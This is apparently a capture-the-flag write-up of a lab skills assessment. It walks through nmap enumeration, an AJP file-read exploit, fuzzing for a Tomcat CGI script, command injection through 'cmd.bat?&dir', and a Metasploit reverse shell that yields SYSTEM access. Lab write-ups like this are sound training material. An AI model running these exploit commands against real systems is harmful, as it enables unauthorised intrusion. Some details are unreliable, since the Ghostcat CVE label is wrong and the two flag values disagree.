Attacking Common Applications - Part I
This is the part one of the Attacking Common Application’s skills assessment section.
Summary (How?)
We are presented with a Windows host that has several services running. Among these the vulnerable one is Tomcat 9.0.0.M1 running on port 8080. This does not have any manager pages available, and its vulnerable to several CVEs including Ghostcat and CVE-2019-0232, the latter was the key to get into the machine, as it allowed for RCE. The problem here is that this RCE wasn’t that straight forward, first we needed to fuzz a vulnerable CGI script located in /cgi/cmd.bat and the use a metasploit module that abused this vulnerability to obtain a reverse shell as NT authority/system.
Situation
During a penetration test against the company Inlanefreight, you have performed extensive enumeration and found the network to be quite locked down and well-hardened. You come across one host of particular interest that may be your ticket to an initial foothold. Enumerate the target host for potentially vulnerable applications, obtain a foothold, and submit the contents of the flag.txt file to complete this portion of the skills assessment.
Enumeration
The nmap scan shows some open ports. We are clearly dealing with a Windows host
└─$ nmap -p- --min-rate=1000 10.129.201.89 -oN nmap-all-ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 22:48 -03
Warning: 10.129.201.89 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.201.89
Host is up (0.17s latency).
Not shown: 65328 closed tcp ports (reset), 188 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
47001/tcp open winrm
More detail
└─$ nmap -sC -sV --min-rate=1000 10.129.201.89 -p 21,80,135,139,445,3389,5985,8000,8009,8080 -oN nmap-open-ports Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 22:54 -03
Nmap scan report for 10.129.201.89
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd | ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_09-01-21 08:07AM <DIR> website_backup
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Freight Logistics, Inc
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=APPS-SKILLS1
| Not valid before: 2025-06-29T01:44:37
|_Not valid after: 2025-12-29T01:44:37
| rdp-ntlm-info:
| Target_Name: APPS-SKILLS1
| NetBIOS_Domain_Name: APPS-SKILLS1
| NetBIOS_Computer_Name: APPS-SKILLS1
| DNS_Domain_Name: APPS-SKILLS1
| DNS_Computer_Name: APPS-SKILLS1
| Product_Version: 10.0.17763
|_ System_Time: 2025-06-30T01:54:58+00:00
|_ssl-date: 2025-06-30T01:55:07+00:00; 0s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open http Jetty 9.4.42.v20210604
|_http-title: Site doesn't have a title (text/html;charset=utf-8). | http-robots.txt: 1 disallowed entry
|_/
8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.0.M1
|_http-server-header: Apache-Coyote/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required | smb2-time:
| date: 2025-06-30T01:55:01
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.23 seconds
Interesting findings
- FTP with anonymous login allowed with a
website_backupfolder - The computer name is
APPS-SKILLS1 Jetty 9.4.42.v20210604running on port 8000Tomcat 9.0.0.M1running on port 8080
SMB does not allow a null session
└─$ smbclient -N -L //$IP/
session setup failed: NT_STATUS_ACCESS_DENIED
Contents of website_backup
From a windows hosts, by accessing to ftp://10.129.201.89/website_backup/ we can easily view its contents
There’s nothing interesting here
Main page
If we visit the IP on port 80 we find this page
Here wappalyzer identified the following technolgies
- IIS
10.0 - ASP.NET
Jenkins running on port 8000
Interesting, although it does not seem necessary for the flags
CVE-2019-0232
Apache Tomcat 9.0.0.M1 is vulnerable to CVE-2019-0232, an unauthenticated RCE vulnerability. It’s explained in this github repository. However, this target is not vulnerable as the /cgi folder is not present.
Exploiting Tomcat
Already tried the following CVE’s that could easily leverage RCE
- CVE-2017-12617
- CVE-2019-0232
- CVE-2025-24813
CVE-2020-10487
Here it’s explained that
Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising.
This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible
The above scan confirms that ports 8080 and 8009 are open. The PoC code for the vulnerability can be found here. Download the script and save it locally. The exploit can only read files and folders within the web apps folder, which means that files like /etc/passwd can’t be accessed. Let’s attempt to access the web.xml.
└─$ python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py $IP -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://10.129.201.89:8009/asdf
----------------------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to Tomcat
</description>
</web-app>
There isn’t much here
CVE-2019-0232
Eventually, I got back to this CVE. I decided to do a broader fuzz to find a cgi binary. Maybe even though the /cgi folder returns a 404 Not Found there are some scripts there.
For this, I used SecLists common.txt wordlist.
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u "http://$IP:8080/cgi/FUZZ.bat"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.201.89:8080/cgi/FUZZ.bat
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
cmd [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 210ms]
:: Progress: [4746/4746] :: Job [1/1] :: 245 req/sec :: Duration: [0:00:23] :: Errors: 0 ::
And FINALLY got a hit. Given its name, cmd.bat is probably all we need to get a foothold and retrieve the flag.
And there it is: RCE.
┌──(frang4㉿laptop-de-fran)-[~/academy-htb/attacking-common-applications/skills-assessment/part-I]
└─$ curl http://$IP:8080/cgi/cmd.bat?\&dir
Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi
09/29/2021 09:26 AM <DIR> .
09/29/2021 09:26 AM <DIR> ..
09/01/2021 07:58 AM <DIR> %SystemDrive%
09/29/2021 09:26 AM 73,802 bHPVV.exe
08/31/2021 01:55 PM 48 cmd.bat
2 File(s) 73,850 bytes
3 Dir(s) 28,372,836,352 bytes free
After some fail intents to upload the payload for a reverse shell using the URL, I decided to look up in metasploit for any modules that could help and found this one
msf6 > search exploit tomcat cgi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
When running it we get this error, which is weird as we have already checked that the target is vulnerable
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > run
[-] Handler failed to bind to 10.10.15.97:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
Let’s run it anyway as its suggested in the output
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > set ForceExploit true
ForceExploit => true
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > run
[-] Handler failed to bind to 10.10.15.97:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Command Stager progress - 6.95% done (6999/100668 bytes)
[*] Command Stager progress - 13.91% done (13998/100668 bytes)
[...]
[*] Command Stager progress - 97.34% done (97986/100668 bytes)
[*] Sending stage (177734 bytes) to 127.0.0.1
[*] Command Stager progress - 100.00% done (100668/100668 bytes)
[!] Make sure to manually cleanup the exe generated by the exploit
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54562) at 2025-06-30 16:10:50 -0300
meterpreter >
And SUCCESS
meterpreter > shell
Process 2956 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi>whoami
whoami
nt authority\system
Finally, the flag
Directory of c:\Users\Administrator\Desktop
09/30/2021 10:41 AM <DIR> .
09/30/2021 10:41 AM <DIR> ..
09/29/2021 09:22 AM 32 flag.txt
1 File(s) 32 bytes
2 Dir(s) 28,372,611,072 bytes free
c:\Users\Administrator\Desktop>type flag.txt
type flag.txt
f55763ee5d3d0
Flags
- What vulnerable application is running?
Tomcat - What port is this application running on?
8080 - What version of the application is in use?
9.0.0.M1 - Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.
f55763d31e5d3d0